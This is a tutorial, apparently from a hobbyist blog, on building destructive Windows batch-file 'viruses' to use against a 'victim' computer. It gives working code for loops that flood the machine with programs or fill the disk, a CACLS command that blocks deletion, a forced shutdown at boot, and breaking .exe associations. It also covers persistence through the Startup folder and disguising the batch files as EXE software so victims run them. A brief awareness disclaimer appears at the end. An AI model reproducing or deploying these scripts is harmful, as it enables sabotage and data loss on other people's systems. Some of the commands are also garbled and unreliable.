No need to learn programming, no need to learn any type of languages. Here you can easily learn how to create viruses with few general CMD commands and how to deal with virus to avoid them. This section serve you not only at funny end but also help you to learn that what you need to do for preventing virus attack to your system.


Here we are going to share with you i.e. How to make Virus and how to fight with them-

So lets we start with the small CMD Virus-

So first have a look on some CMD Commands-
MS Dos is the one of the Opearting system in which maximum virus is made by Hackers and Virus makers.

Even Autorun.inf Virus is also made in the MS DOS.

You can also make these viruses on notepad with CMD commands.


First learn these basics Commands of MS DoS which is used in Notepad-

1) CD-Change directory or open any directory.
Ex- C:\CD windows (refer figure below)

2) MD-Make directory
Ex.C:\MD Rahul
This wil make the folder in C directory named Rahul.

3) Goto
Used to shifting the control.

4) Copy

Used to copy the data into another folder.

C:\windows\system32 C:\Rahul

This will copy the content of system32 into the Rahul folder.

5) Open
Used to open any thing.
Ex.Open Notepad

How to Open Notepad-
Just Click on start and the run.
and type notepad and press Enter.

You will get the a Notepad Window-
Now just you have to create Virus's on this windows.


This will open the Notepad.

So these are the some basics commmand and by using these commands we are going to make some intersting virus's.
lets Start-
How to make Small virus which Open continuosuly many processes and programs.

Step 1-

First you need to open Notepad.
Click on the Start and the Run and type Notepad.
This will open the notepad.

Step 2-
Write these commands into the Notepad.

Start Notepad
Start Calc
Start mspaint
Start Explorer
goto Hack

Step 3-

Just now save these commmands by pressing CTR+S and type name Virus.bat and save into your desktop.

The file name is anything but extension should be .bat.

Now open the file.
and just by double clicking on file your computer goes to Hang On.
Notepad,Calculator,Microsoft paint and Internet Explorer Opens and Opens again and again.

So Always try these Virus in the victim computer not your OWN.

You need to restart your Computer to correct this Problem.

Now you will think that any one can edit this commands in notepad and escape of virus.
So Don't worry there is another trick.

You can download Batch to EXE convertor file from net.

Which convert your Batch file into an Execute file and Victim will easily double click on our program. he thinks that this is kind of a software, But do not know that this is a virus.

Now How to RUN this  program On StartUp-

Just add one more command into this code.

Copy C:\Documents and Settings\administartor\Desktop\Virus.exe C:\Documents and Settings\administartor\Start Menu\Programs\Startup

This will copy the File into the start up entry and it opens when the computer Start.

So if any victim open this file for a single time then his computer Hang Out forever until he put windows again. He struck with major destruction.

He will need to re-install his Windows to correct this problem.

Even he will not able to open My Computer when this virus is running on his system.

So now you think that how dangerous this Virus.

Here are the Some other Virus Coding-

Even you can also make Virus depending upon your knowledge by your own Coding.-


Same procedure-
Just copy this code in place of previous code-

md rahul
cd rahul
Copy C:\windows\system32 C:\Documents and Settings\administartor\Desktop\rahul
goto Hack

Save Virus.bat and then convert into an executiable file.

This will make directories name rahul on the desktop and copy the system32 files in this folder again and again it make rahul into rahul folder again and again.

So Victium Hard Disk Either CRASH or get Full.

Now Make it more dangerous HOW-

Victim Can easily Delete this folder By pressing SHIFT+DEL and get free up from your virus. 

But still you have the method
Just add one more command into previous code.

CACLS rahul /E /P Everyone:N

SO now the final code becomes like this-

md rahul
cd rahul
Copy C:\windows\system32 C:\Documents and Settings\administartor\Desktop\rahul
CACLS rahul /E /P Everyone:N
goto Hack

Now Victim can't delete any of the folder.

Simply it means Hard Disk Crash.

2. Shuting down PC in specified time

Now for the SHUTING DOWN PC when it BOOT up for 30 Seconds.
 The Biggest Thing about this is Victim Knows that his Computer will shutdown in 30 seconds but he will not able to do anything.

Just Copy this code into Notepad and save virus.bat on desktop.

C:\Shutdown -s -f -t 30
Copy C:\Documents and Settings\administartor\Desktop\Virus.exe  C:\Documents and Settings\administartor\Start Menu\Programs\Startup

Now victim PC will shutdown in 30 sec when it boot up/Start up.

3. How to Hack .EXE files

Just type-

assoc .exe=hack
Copy C:\Documents and Setings\administartor\Desktop\Virus.exe  C:\Documents and Settings\administartor\Start Menu\Programs\Startup

No EXE file now execute.

How to correct this problem.

1) Reinstall OS.


If you still have open CMD then enter-
assoc .exe=exe

This will correct the problem.


Please Don't try it into your computer it can Totally Crash your Hard Disk OR System.
You will think then why this post is here. It is for very noble cause to spread awareness among non-tech guys suffering from virus attack. This article clearly demonstrate that how hackers mind works. To avoid any of the virus attack on you, this article can help you as basics of virus design is cleared. We are not responsible of any misuse of this article and any destruction to system to anybody caused by it.

For any query post here